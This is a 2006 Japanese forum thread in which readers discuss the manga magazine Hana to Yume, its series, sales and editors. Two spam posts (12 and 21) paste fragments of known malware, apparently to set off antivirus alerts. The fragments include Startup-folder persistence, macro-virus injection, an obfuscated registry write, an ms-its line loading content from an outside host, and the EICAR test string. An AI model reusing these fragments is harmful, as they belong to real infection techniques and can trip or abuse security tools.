2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

さぁて今号の花とゆめ★111号

1 :花と名無しさん:2006/12/21(木) 20:27:38 ID:???0
        _  _
    __/ /_/ /__
   /___   __  __/    _  _   _  _
      /‐‐/ /‐‐/_  r‐┐ / └' └v‐' └' └、
  ___ノ  / /   __ノ_/ /_/ ,‐; ,、  / ,ィ ,‐; ,.、  }
  /__,ィ / /  /__,r' ____/___// ー' ,イ {/_// /ノ /
    /__/ {___ハ___/__ノ ̄´ ヽ____,イ__,ノ

羅列その他、あれこれ語っていきましょう。

前スレ
さぁて今号の花とゆめ★110号
http://comic6.2ch.net/test/read.cgi/gcomic/1165027478/

連載中作家など関連スレは>>2-4あたり

2 :花と名無しさん:2006/12/21(木) 20:27:51 ID:???0
イチハ・女子妄想症候群【フェロモマニアシンドローム】2
http://comic6.2ch.net/test/read.cgi/gcomic/1122809119/
絵夢羅作品について
http://comic6.2ch.net/test/read.cgi/gcomic/1059286718/
【兄ワールド】加藤四季 その2【お嬢様と私】
http://comic6.2ch.net/test/read.cgi/gcomic/1151203269/
◆◆ 草凪みずほ 其の参 ◆◆
http://comic6.2ch.net/test/read.cgi/gcomic/1135248738/
ネタ心者歓迎!!シークエンス完全攻略スレッド
http://comic6.2ch.net/test/read.cgi/gcomic/1046784291/
【3年Z組】磁ロックスについて【ポチ先生ー!】
http://comic6.2ch.net/test/read.cgi/gcomic/1106137960/
【オデット】鈴木ジュリエッタ【ドルチェ】
http://comic6.2ch.net/test/read.cgi/gcomic/1145799723/
高尾滋 14・ゴールデンデイズ
http://comic6.2ch.net/test/read.cgi/gcomic/1150968274/
【ブコフで】中条比紗也ピザ12枚目【花ざかり】
http://comic6.2ch.net/test/read.cgi/gcomic/1165349001/
仲村佳樹 スキップ・ビート! ACT.25
http://comic6.2ch.net/test/read.cgi/gcomic/1158925303/

3 :花と名無しさん:2006/12/21(木) 20:28:03 ID:???0
■12■樋口橘 学園アリス■13■
http://comic6.2ch.net/test/read.cgi/gcomic/1164239392/
【VBR】日高万里 15【セカキラ】
http://comic6.2ch.net/test/read.cgi/gcomic/1166521021/
福山リョウコ・悩殺ジャンキーvol.5
http://comic6.2ch.net/test/read.cgi/gcomic/1161916988/
ふじもとゆうき キラメキ☆銀河町商店街
http://comic6.2ch.net/test/read.cgi/gcomic/1148702950/
【死神になっても】闇末★松下容子26【待ちます】
http://comic6.2ch.net/test/read.cgi/gcomic/1151067988/
【末のウルルン】松月滉T△T6【妄想マンセー記】
http://comic6.2ch.net/test/read.cgi/gcomic/1155883647/
★南マキ★part3
http://comic6.2ch.net/test/read.cgi/gcomic/1158233460/
▽▼佑羽栞▼▽フルハウスキス3軒目
http://comic6.2ch.net/test/read.cgi/gcomic/1165332381/
羅川真里茂 vol.12
http://comic6.2ch.net/test/read.cgi/gcomic/1160571500/

4 :花と名無しさん:2006/12/21(木) 20:28:13 ID:???0
【関連スレなど】

さぁて今号の別冊花とゆめ・ザ花とゆめ5号
http://comic6.2ch.net/test/read.cgi/gcomic/1161686055/
昔の『花とゆめ』を語るスレ
http://comic6.2ch.net/test/read.cgi/rcomic/1083120925/
★白泉社限定★新人&受賞者に八言目!
http://comic6.2ch.net/test/read.cgi/gcomic/1159189021/
◆◆◆白泉系雑誌投稿者12◆◆◆
http://comic6.2ch.net/test/read.cgi/gcomic/1165748933/
【早売りゲッター】総合スレ・十五冊目【ネタバレ】
http://comic6.2ch.net/test/read.cgi/gcomic/1166260791/

少女漫画情報館
http://forgirls.hp.infoseek.co.jp/
少女漫画板 (少女漫画板の避難所として利用してください)
http://jbbs.livedoor.jp/comic/1374/
フルーツバスケット避難所39
http://yy14.kakiko.com/test/read.cgi/session00/1160784701/

5 :花と名無しさん:2006/12/21(木) 20:28:29 ID:???0
2号テンプレ

表紙(幸福)…
巻頭(アリス)…
幸福…
VBR…
SA…
グラサン…
がんばり…
悩殺…
オデット…
兄…
NG…
ブラッディ…
乳…
潔癖…
アラクレ…
シュガー…

付録(SA コミックス&CD BOX)…

3号表紙(スキビ)…
3号巻頭(幸福)…
2号総評…

6 :花と名無しさん:2006/12/21(木) 20:46:44 ID:???0
今号はゆくるだるく浅い中味でした
買わない方が正解だった

7 :花と名無しさん:2006/12/21(木) 21:09:36 ID:???0
じゃあ今号買わない私は勝ち組?

8 :花と名無しさん:2006/12/21(木) 21:12:09 ID:???0
どれも別にとばして読んでも大丈夫な内容

9 :花と名無しさん:2006/12/21(木) 21:32:38 ID:???0
>>1


10 :花と名無しさん:2006/12/21(木) 21:46:08 ID:4O/Zbjgx0
天地動乱!空前絶後の大スクープ!?
みんな知ってる一部上場の大企業がアンナことまで!?
http://money4.2ch.net/test/read.cgi/venture/1145267857/
http://human5.2ch.net/test/read.cgi/sfe/1148323497/
http://sakura02.bbspink.com/test/read.cgi/hnews/1141884356/
http://news18.2ch.net/test/read.cgi/bizplus/1156759874/

キミの携帯のバイブ機能に隠された危険なワナとは・・・!?
http://sos.xxxxxxxx.jp/
http://wch.hippy.jp/d2h/news/docomo.html
http://www13.atwiki.jp/docomodake/

11 :花と名無しさん:2006/12/21(木) 22:16:56 ID:???0
過疎ってるよ〜

12 :<body onload=window()>:2006/12/21(木) 22:55:50 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

13 :花と名無しさん:2006/12/22(金) 01:51:19 ID:???O
ウイルスなんだろうか?このスレに変なタグが…
私はケタイだからいいが。
みんなセキュリティガンガレ

14 :花と名無しさん:2006/12/22(金) 02:22:33 ID:???0
いつものことだし、いまさら感が…

15 :花と名無しさん:2006/12/22(金) 04:44:06 ID:???0
>>13
ただのノートントラップ

16 :花と名無しさん:2006/12/22(金) 05:05:06 ID:Cm0m+6W7O
花ゆめの漫画家ってみんな病んでる

17 :花と名無しさん:2006/12/22(金) 07:12:06 ID:???0
ちょ〜話が薄いマンガばっかりなせいか
いまいち盛り上がりに欠ける今号とスレ
新人や中堅ばっかりだとこんな風になるのか

18 :花と名無しさん:2006/12/22(金) 08:41:11 ID:???O
言い方は悪いかもしれんが自分も含めてだけど
単にヲバ受けする漫画を廃除した結果
昼からネットに張り付くヲバが盛り下がってるだけじゃ?
編集はこれでもやれるって確証があるからやったんだろうし
タゲ低年齢化に向けた準備って感じ。

19 :花と名無しさん:2006/12/22(金) 08:49:32 ID:???0
2ちゃんねる漫画大賞2006
http://comic6.2ch.net/test/read.cgi/csaloon/1166744048/l50

投票よろしく

20 :花と名無しさん:2006/12/22(金) 09:03:11 ID:???0
確証がないからやったんだと思ったけどな

21 :<body onload=window()>:2006/12/22(金) 10:25:15 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


22 :花と名無しさん:2006/12/22(金) 13:14:49 ID:???0
今回休載のスキビ、しゃにむ、ゴルデンは売り上げ的には上中下と綺麗にバランス取れてるんだよな。
もしこれがスキビ、VBR、アリスの3つだった方が一般的には問題あるんじゃないだろうか?

23 :花と名無しさん:2006/12/22(金) 13:41:03 ID:???0
>>22
フルバもうないから、スキビ、VBR、アリスの3つ同時になかったら困るだろうね
自分はヲバ好みだからこの三つより上の三つない今号の方が買う気失せたけど


24 :花と名無しさん:2006/12/22(金) 15:17:55 ID:???0
お店ではいつもよりも残ってるんだよね今号
発売日すぎてからいつも買ってるんだけど今回は売り切れは絶対ないね

25 :花と名無しさん:2006/12/22(金) 17:39:39 ID:???0
しゃにむに、ゴルデンはもう売れてないしいらんでしょ

26 :花と名無しさん:2006/12/22(金) 18:06:22 ID:???0
それぞれの作品に支持者がいるんだから、そう言い方はヤメロ。
つーか、だったら他に誰の作品を載せるんだっつーの。
最近のりなちゃっぽい新人よりは、しゃにむ・ゴルデンのほうが売れるよ。
今回の新刊もあの吸血鬼モノがあまりに売れてない。

27 :花と名無しさん:2006/12/22(金) 18:32:29 ID:???O
最近のりなちゃ新人に勝たれても微妙。
フルバないと雑誌が地味になったな。
スキビじゃ看板として若い女の子や男性読者に人気不足だし、
自分の好きなアリスも看板の器じゃないと思う。
砂糖姫終わったしかずこが改心して次当てたら見直す。

28 :花と名無しさん:2006/12/22(金) 18:38:47 ID:???0
いっぺん堕落したら元に戻れないのは
江口寿史・冨樫・ヨコタン・直子姫を見ても明らか

29 :花と名無しさん:2006/12/22(金) 19:20:10 ID:???0
りなちゃ化した方がいいというか
もうすでに始まっている

30 :花と名無しさん:2006/12/22(金) 19:56:31 ID:???0
>>26
こわ・・・

31 :花と名無しさん:2006/12/22(金) 20:14:18 ID:???0
>>30
なにが?

32 :花と名無しさん:2006/12/22(金) 20:22:41 ID:???0
最近白癬雑誌がなんとなく白癬らしくないと感じる。
なんかちょっとカナシス。
そのなんとなくがどんなものか具体的に言葉に出来ないのが余計カナシス。

33 :花と名無しさん:2006/12/22(金) 21:28:13 ID:???0
グラサン、マリアが主人公の母でその娘が主人公なのはガチだろうが、
まさか主人公がヒーローと異母兄妹ってことはさすがにないよな?

34 :花と名無しさん:2006/12/22(金) 21:35:02 ID:???0
冬ソナかっ

35 :花と名無しさん:2006/12/22(金) 21:43:44 ID:???0
昔の白癬っぽさって…
スキビみたいな芸能モノって昔はよくマーガレットで多いタイプでこの辺りも違う感じ
今の連載で一番昔の白癬っぽいのって実はオデットかな
線のバランスや構図の安定感、ストーリーの恋愛色うすくてとりとめもないけど
どこがじっくりよむと感じるところがある・・
次がゴルデン、しゃにむかな

私の好みではなくあくまで昔なつかしの白癬っぽい読み物って感じた順

36 :花と名無しさん:2006/12/22(金) 22:49:55 ID:???0
>>31
レスの内容が必死すぎて

37 :花と名無しさん:2006/12/22(金) 22:50:11 ID:???0
冬ソナってそんな話なのか…
しかし、今回休載した話5つしか読んでない自分にとっては
今号はスルーしかない。
>22の言うように売り上げでバランスとってるんだろうか。
単行本派がどんどん増えそうだなあ

38 :花と名無しさん:2006/12/22(金) 23:38:39 ID:???0
うーん、やっぱり今月なんか読みごたえがないなあ。
やっぱり中堅陣も混ざってこその雑誌だなあ。自分にとって。
今月も好きな連載はあるのに。

39 :花と名無しさん:2006/12/22(金) 23:40:20 ID:???0
>>30>>36
かまってもらえてうれしいのはわかったから、もうやめろよ。
くだらないことでスレ消費すんな。
人の言うこと否定するならちゃんと反論したら?
空気が悪くなる。

40 :花と名無しさん:2006/12/23(土) 00:07:45 ID:???0
昔の白泉っぽさっていうか過去の代表的な花ゆめ漫画は
柄亀:演劇・芸能界もの。お医者:医大生・職業もの。赤僕:家族愛もの。
フルバ:ファンタジーもの。僕地球:ファンタジーもの。花キモ:男装学園もの。天禁:ファンタジーもの。

最近は普通の学園ものとか多いけどやっぱ多少現実離れしてこそ花ゆめだと思う。

41 :花と名無しさん:2006/12/23(土) 00:10:44 ID:???O
>40
ヨコタンは黒歴史かwww

42 :花と名無しさん:2006/12/23(土) 00:11:50 ID:???0
そうだねー。舞台が多少現実離れしていて、プラスで人間心理に共感できるものが
昔ながらの花ゆめらしいと思うよ。
個人的にはオデットはそこから外れるな。あの作品の心理描写に共感できないので。

43 :花と名無しさん:2006/12/23(土) 00:37:22 ID:???0
>>41
あー売り上げスレの一千万以上売れてる花ゆめ漫画を並べただけだから、
別にヨコタンに恨みがあったわけじゃないんだよw

44 :花と名無しさん:2006/12/23(土) 02:42:30 ID:???0
しゃにむ売れてないとは傲慢な…

現状の花とゆめでトップ3に入る売れ行きと思うぞ。

45 :花と名無しさん:2006/12/23(土) 02:53:22 ID:???0
売り上げ合計で言ったら、TOPだろうね
巻数が違うし

46 :花と名無しさん:2006/12/23(土) 03:42:12 ID:???0
なんやかんや言われてるけど、来年はNGがくると思うww
もうちょっとリアが好きそうなキャラをテコ入れしてきそうな予感がするんだ。

47 :花と名無しさん:2006/12/23(土) 03:47:00 ID:???0
>>46
それよりは、もっとリアが好きそうなキャラで構成された新連載を持ってきたほうがw

48 :花と名無しさん:2006/12/23(土) 06:52:57 ID:???0
>>44
しゃにGOも昔はスキビやVBR位の売り上げだったから今の連載陣では間違いなく総売り上げではTOPだろうけど
新刊の売り上げは悩殺、幸福と同レベルの中堅以下まで落ち込んでるからね。
アニメ化でもすればもう一度準看板くらいの売り上げになる実力はあると思うけど・・・

49 :花と名無しさん:2006/12/23(土) 07:38:23 ID:???0
編集は売り込み下手だよね。
長期化と読者層の変化で売り上げ落ちたなら
特集組むとかダイジェストか番外編を間に描いてもらうとか
読んでもらえるきっかけを作ればいいのに。

フルバ、スキビ、VBR、アリス看板だから
それ差し置いてそうもいかなかったんだろうけど。

50 :花と名無しさん:2006/12/23(土) 07:50:37 ID:???0
最近の読者なんだけど
VBRって人気あるの?
もしくは昔はあったの?
絵も話もひどくてびっくりした。
新人よりひどいというか
プロ作品とは思えないというか。

51 :花と名無しさん:2006/12/23(土) 08:43:53 ID:???0
>>50
少なくとも今の花ゆめではフルバの次か次々位には売れてる。そのうちアリスに追い抜かれそうだけど。

52 :花と名無しさん:2006/12/23(土) 08:47:36 ID:???O
まだ10巻前後の頃のしゃにむは週間ランクトップ10によく入ってたことを思い出した
昔は巻頭カラーもよく貰ってたのに最近は…

53 :花と名無しさん:2006/12/23(土) 09:01:31 ID:???O
二軍落ちしないで中身のある作品がかけるだけまし。
スキビは神か。

54 :花と名無しさん:2006/12/23(土) 10:16:22 ID:???O
神のレベルが低いんですがw
あくまで花ゆめで売れてるだけで
他雑誌の看板と比べたら無惨。
フルバとか花君とかが神。

55 :花と名無しさん:2006/12/23(土) 11:00:55 ID:???0
フルバが終了した途端スキビが神とか言われてもw

56 :花と名無しさん:2006/12/23(土) 11:03:50 ID:???0
不思議なんだけど、リボンスレでもマーガスレでも同じように、
つまんなくなった、看板作品が無い、もうおしまいだ、みたいな事が書かれてるのね。


57 :花と名無しさん:2006/12/23(土) 11:16:37 ID:???0
りぼんの部数は絶頂期200万部越えしてたのに
今や50万部程度。
りなちゃのトップはちゃおに変わったし。
マーガは花男の後がないんだっけ?

58 :花と名無しさん:2006/12/23(土) 11:41:09 ID:???O
天才高屋が特別なだけでこんなもんじゃね?
はなゆめとか読んでたらふつうに学校でキモイおたく認定じゃん
大ヒット大ブーム期待してるわけ?

59 :花と名無しさん:2006/12/23(土) 11:44:00 ID:???0
ラブコンは別マだっけ?でもあれも漫画読みにはそんなに受けがよくないんだよね・・・
このマンにあったスキビの重大発表がアニメ化だとしたらどれだけ伸びるだろうね

60 :花と名無しさん:2006/12/23(土) 11:45:05 ID:???0
りぼんもマーガも終わってるもんな。
花ゆめはそこまで行ってないと思いたいけど
フルバ終わってからりぼんの後道に激しく続いてる気がする。
でもしゃにむが終わるまでは買うかな。

61 :花と名無しさん:2006/12/23(土) 11:46:38 ID:???O
アニメ化きたら1000万部超えるでしょうね

62 :花と名無しさん:2006/12/23(土) 11:47:58 ID:???0
>スキビの重大発表がアニメ化

あの絵でアニメになっても激しくスルーされて終了。
少なくともアリスよりも低いレベルで終わると思う。
あの絵に萌えは絶対無理だし、アニヲタにはつまらんありきたりな話。

むしろTBSの昼ドラか衛星系のドラマなんじゃないかと思ってる。
スキビはタゲ層主婦だろうしここら辺なら少しは受けるかも?
アニメ化ならキャラヲタのいる幸福、SA、悩殺、VBRのどれかが妥当?

63 :花と名無しさん:2006/12/23(土) 11:48:55 ID:???0
>>アニメ化きたら1000万部超える

釣りだと思うけどスキビじゃ無理だと思う。
アリスでさえ無理だったんだから。

64 :花と名無しさん:2006/12/23(土) 11:49:28 ID:???0
エェ!アリスいつ1000万部超えたの!

65 :花と名無しさん:2006/12/23(土) 11:55:23 ID:???O
部数当てにならないよ。
うちのまわりはフルバや、ぼく球、動物のお医者さんはしってても
誰も天禁なんかしらね。

66 :花と名無しさん:2006/12/23(土) 11:57:07 ID:???0
フルバ、動物のお医者さんはテレビやってたし。
ぼく地球は自殺者だしたんでしょ?

67 :花と名無しさん:2006/12/23(土) 11:58:32 ID:???0
>>62
漫画のドラマ化はどの局も躍起になってるから昼ドラじゃなければもしかしたら行けるかもね。
それでも一巻辺りで70万部か・・・

68 :花と名無しさん:2006/12/23(土) 12:04:01 ID:???0
天禁は一般層の知名度はかなり低いだろうね。でも前にあった世界コスプレコンテストで
ブラジル人が天禁のコスプレで優勝するくらいだからその筋では有名なんでしょw

69 :花と名無しさん:2006/12/23(土) 12:09:53 ID:???0
スキビは結構巻数稼ぎそう。
全30巻なら一冊33.3万部で1000万部だし
今の牛歩でダラダラ続ければ突破するでしょw

70 :花と名無しさん:2006/12/23(土) 12:27:07 ID:???0
なんか絵の流行り廃り1つでどうこうっつーのも悲しいね。

71 :花と名無しさん:2006/12/23(土) 12:34:17 ID:???0
でも絵って第一印象だし。重要だよね。
一瞬みて古臭いってマイナスイメージ持たれるより、
今流行りの絵!とかまではいかなくても
そういう違和感の無いほうがより手にとって貰いやすいだろうし。

72 :花と名無しさん:2006/12/23(土) 12:43:24 ID:???0
古都の今号での変わりぶりは
そうやって流行りの画を目指して錯誤の結果みたい。

73 :花と名無しさん:2006/12/23(土) 12:45:14 ID:???0
古臭い絵の方が少女漫画っぽいと感じる2世代の自分は駄目読者・・・・・・orz

74 :花と名無しさん:2006/12/23(土) 12:57:44 ID:zZR7d8w10
古宮のセクハラみたいなエロはいらない・・・。
りなちゃ化しても性コミ化だけはしてほしくない・・。

75 :花と名無しさん:2006/12/23(土) 13:02:08 ID:???0
絵って大事だと思うよ。
スキビとか面白かった頃は良くても今の展開になってから
絵のキモさが急激に言われだしたし。だからコミックス買うのもやめた。
ファンサイトとかでもスルーされてるし。

逆にヨコタンみたく話は糞でも絵がよければそれなりのヲタはつく。
未だに待ってるヲタもいるしなぁ。
最近の絵じゃ無理そうだけどね。

76 :花と名無しさん:2006/12/23(土) 13:05:45 ID:???0
スキビの絵はそら無理だけど
よほど絵がひどくなければ後は話かなー自分は。

NGは何気に絵も話もヲタ受けはいい気がする。
このテンポを維持できればだけど。

77 :花と名無しさん:2006/12/23(土) 13:07:47 ID:???0
NG最近面白くなってきた

78 :花と名無しさん:2006/12/23(土) 13:10:46 ID:???0
蓮の正面顔はNG!
ダクムン編はまだまだこれから?NGな日々は続く…(笑)

NGつまらないから自分はオタじゃなかったんだ、よかった。

79 :花と名無しさん:2006/12/23(土) 13:13:42 ID:???0
>>78
花ゆめ買ってる時点でヲタ素質十分同じ穴のムジナ

80 :花と名無しさん:2006/12/23(土) 13:14:03 ID:???0
>>78
ここ来てる時点でオタだと思うw

81 :花と名無しさん:2006/12/23(土) 13:19:24 ID:???0
つっこみありがとうw
やたらNGはオタ受けってするって言う人がいるからさ。

82 :花と名無しさん:2006/12/23(土) 13:30:37 ID:???0
自分ヲタだけどNGはべつにーって感じだ。
ただなんとなくデジャブ感

83 :花と名無しさん:2006/12/23(土) 14:07:40 ID:???O
そういや草凪さんは、アシ募集してたけど見つかったのかな?
同人時代の信者の応募が多そうな気がするw
でも、古臭いとはいわれてても画力は確かにすごいし、あの緻密な原稿を扱うのはとても勉強になるだろうけど、付いてくのも大変だろうな

84 :花と名無しさん:2006/12/23(土) 14:22:11 ID:???0
NGはギャグだと思って読めばヲタじゃなてもいけると思う。
ホモ臭ささえなければだけどギャグとしてなら許容範囲内。
つか主人公と芹沢をもっと中心にすればいけると思う。
特別好きな作品にはなり得ないけど、地味に読める作品。それこそスキビ系?

逆に最初期待したけど下降したのがオデット。
コミックスも一向に売れないし…絵のせいか?

85 :花と名無しさん:2006/12/23(土) 14:28:02 ID:???0
アリス並のタゲ受け絵とフルバ級の話・演出力と
しゃにむ級の躍動感・表情豊かさと闇末なりの美キャラと
幸福のアシさん並の優秀アシがいれば神漫画になると思う。

そして京アニやボンズでアニメ化されれば完璧。

86 :花と名無しさん:2006/12/23(土) 14:36:02 ID:???0
実力よりも変臭の御威光がものをいう花夢では
読者の意見なんかどうでもいい。
いかに変臭の言う通りに描けるかが大事。

87 :花と名無しさん:2006/12/23(土) 14:57:53 ID:???0
編集のいう通り描いてループしまっくっている
作品多数・・・。


88 :花と名無しさん:2006/12/23(土) 15:08:14 ID:???O
フルバてアニメ化する前の売れ行きはどうだった?
もしスキビと同じくらいならスキビもアニメ化で神化しないかね。
夏頃のサプライズはメディア展開だろうからあり得ない話じゃない。

89 :花と名無しさん:2006/12/23(土) 15:22:58 ID:???0
フルバは神神言われてるけど、赤僕を抜けなかったんでしょ?
高屋が神かどうかは、新作の出来次第だろ。
羅川はいちおう、長すぎて時代に合わなくなったものの、しゃにむが
初期はかなり、いまでもそこそこ売れてるんだから。
いちおう高屋の新連載に期待してるけど、こもごものつまんなさは異常だった・・・

90 :花と名無しさん:2006/12/23(土) 15:26:30 ID:???0
>>88
ランク王国のコミックランキングで紹介されてたような記憶があるんで、
今のVBRやスキビ同じかそれ以上は売れてたような気がする。

91 :花と名無しさん:2006/12/23(土) 15:30:00 ID:???0
>>88 フルバは最初から割りと良かったような。
あのドヘタ絵が看板にまで化けたのは意外だった。

92 :花と名無しさん:2006/12/23(土) 16:44:26 ID:???0
スキビはメディア化で売れてくれればいいよ。看板いないし。
でも理解されるの時間かかるかなとも思うけど
トーハンインは6巻くらいからだったと記憶してるし。

93 :花と名無しさん:2006/12/23(土) 17:16:10 ID:???O
>>89
赤僕の場合、完結してから文庫化も含め、少しづつ重版しての累計だから。
フルバも完結から暫くは重版するし、今後、完全版・文庫と出せば累計で抜くんじゃない?

まぁ高屋さんは、今のところフルバ1本。
羅川さんは、赤僕以外に初期のしゃにむも売れてたからね。

94 :花と名無しさん:2006/12/23(土) 18:51:37 ID:???0
表紙のウルの目が怖い…。

瞳孔の部分が輪郭だけ線描かれてて
中身が色薄いから線が目立ってて変。
あれは塗り忘れ?
今までは普通に瞳孔濃く塗ってたよね。

95 :花と名無しさん:2006/12/23(土) 19:40:32 ID:???0
つかスキビとフルバを同列で語るのは無理あるよ。
フルバはヲタから一般、ヲバから厨まで広く受けたし。
スキビとじゃ器が違う。
アニメ化するならキャラに魅力のある漫画がいいな。
今の花ゆめでパッと思いつくのがアリスくらいしかないけど。

赤僕はもっと神だけどしゃにむは微妙なわりによく続くよね。
もう一回赤ちゃん出てくる漫画かかないかな。
羅川さんの描く子供が可愛すぎるw

96 :花と名無しさん:2006/12/23(土) 19:43:28 ID:???0
高屋が神つーかフルバが単に神だっただけって感じ。
フルバは高屋がデビュー前から温めてて
それまでの連載はフルバを書く力が付くまでって事でやってたらしいし。
その念願のフルバが終わった以上、高屋もネタが尽きてるんじゃ…。

でも高屋か羅川かヨコタンかかづこか
過去に神ヒットだしてる人がまたヒット出してくれないと
今の連載陣に神ヒットは確実に無理だと思う。

97 :花と名無しさん:2006/12/23(土) 19:49:15 ID:???0
メディア化でも元が劣化中だと売れないのはアリスが実証済みじゃんw
フルバ以外でも鋼とかハチクロとかヒット作は
メディア化の前から口コミで話題になってたものばかり。
スキビじゃ花ゆめ読んでる人や主婦層以外じゃ名前も知らないだろうし
実際相当漫画ヲタの自分も漫画好き友達も花ゆめ買うまで知らなかった。


早い話、もっと他の新人育ててくんないと。
どの漫画も一定のレベルはあるし悪くはないけど
特別群を抜けてるのが一個もないのはやはり雑誌的に寂しい。

98 :花と名無しさん:2006/12/23(土) 19:51:50 ID:???0
確かにズバ抜けてるのは一個もないねぇ。団子って感じ。
VBRはあんなキモ漫画なのにスキビの次かスキビ以上に売れてるんでしょ?
VBRがヲバじゃなくタゲ人気な事を考えるとこれだけコミクス売れるのは凄いのかも。
あんなキモイのに…最近のヲタガキはワカラン。

99 :花と名無しさん:2006/12/23(土) 19:54:50 ID:???0
>>96
闇末ってどんだけ売れてたの?

100 :花と名無しさん:2006/12/23(土) 20:04:18 ID:???0
イチハが壊れなきゃ
フェロモの次の新連載にヒットを期待できたけど
体壊したんじゃもう無理かな…。

フェロモを無理矢理引き伸ばさないで
ほどほどで終わらせてあげてれば
壊れなかったかもしれないのに…。
ほんと編集は勿体無い事したと思う。

101 :花と名無しさん:2006/12/23(土) 20:13:49 ID:???O
イチハは絵も可愛いしオタ受けも
狙えそうな感じだから確かにもったいなかった。
スキビはメディア化すれば売り上げは
そりゃ伸びるだろうけど絵があの通りで
ヲタ受けは望めないから大した伸びは期待出来ない。

102 :花と名無しさん:2006/12/23(土) 20:27:12 ID:???0
スキビはキャラやストーリーはいいけど絵がなぁ…。
イチハがスキビの作画やってくれたらヒットしそう。

103 :花と名無しさん:2006/12/23(土) 20:39:28 ID:???0
イチハより日高がスキビ描いたら萌えるかもなぁ。
最近は話も微妙になってきたけど
前は確実に話だけなら面白かった>スキビ
絵で読めないけど、もったいない。

104 :花と名無しさん:2006/12/23(土) 20:44:42 ID:???0
あんなヘロいギャグ絵のタマシイ描く人に怨キョが描けるとは思えない。

105 :花と名無しさん:2006/12/23(土) 20:45:14 ID:???0
日高がスキビ描いたら
蓮が馬面でなくなるけど
別の方向にキモイ顔になっちゃうな。

106 :花と名無しさん:2006/12/23(土) 20:45:37 ID:???O
読み切りをシリーズ(連作)や連載にするのはやめて下さい

107 :花と名無しさん:2006/12/23(土) 20:48:07 ID:???0
>>106
でもいきなり新人に連載させるのはリスク高いし
最初は読みきりで様子見て
ある程度アンケ取れたら連載…
って方式になるのは仕方ない希ガス。

問題はそうやって連載になった漫画を
ちょっと人気出たら引き伸ばしまくる所だとオモ。

108 :花と名無しさん:2006/12/23(土) 20:50:34 ID:???0
潔癖は読みきりで終了した方が良かったと思う。

109 :花と名無しさん:2006/12/23(土) 20:53:07 ID:???0
でも潔癖は確実に上達してるね。
このまま無理せず、変臭に潰されず伸びていって欲しいもんだ。

110 :花と名無しさん:2006/12/23(土) 20:57:26 ID:???O
>>104
同意。信者じゃないがあの絵がスキビの魅力と思う。頭身は異常だが
他の人がやると薄ぺらくなりそう。日高とか線は綺麗だが塗り絵。

111 :花と名無しさん:2006/12/23(土) 20:58:29 ID:???0
>>109
上達してるかなぁ?
個人的には最初の話が
絵的にも話的にも一番良作だったと思う。

なんか毎回同じ展開だから
(潔癖症だけどイザって時は触れる)
回を増すごとに新鮮味が無くなってるし。

潔癖症の設定は読みきりだからこそ
活きた設定だと思う。

112 :花と名無しさん:2006/12/23(土) 21:01:48 ID:???O
読み切りの時点で人気があって連載化するなら
連載用に設定・キャラを練り直して、1話目から仕切り直して欲しい。
今の読み切り→連載化って、読み切りをそのまま第一話にして連載化するし。
ただでさえ人気の都合で引き延ばし・打ち切りするのに、それじゃ破綻が目に見えてる。

113 :花と名無しさん:2006/12/23(土) 21:11:45 ID:???0
あの古く濃い絵させなければスキビ好きだったのにな。
一応ギリギリタゲ層の自分にはあれは無理。マジ無理。
同じ理由でゴールデンとしゃにむも無理。

114 :花と名無しさん:2006/12/23(土) 21:12:19 ID:???0
私も潔癖は一番最初の話が好き。
絵は上達してると思うけど、話はうーん…
絵柄は花夢に無い感じでいいし、見せ場も上手い。潔癖じゃなくて別の話読みたいな

115 :花と名無しさん:2006/12/23(土) 21:13:24 ID:???0
潔癖なんて受賞作が
いい感じにキレイに終わってたのに
続編の読み切りで潔癖悪化してて
受賞作ブチ壊しだったよね。

読み切りの為に作った話で
無理矢理続編描くと破綻しちゃうっていう
いい見本だった。

116 :花と名無しさん:2006/12/23(土) 21:15:05 ID:???0
ごめん、アンカー付け忘れた。
>>115>>112へのレスです。

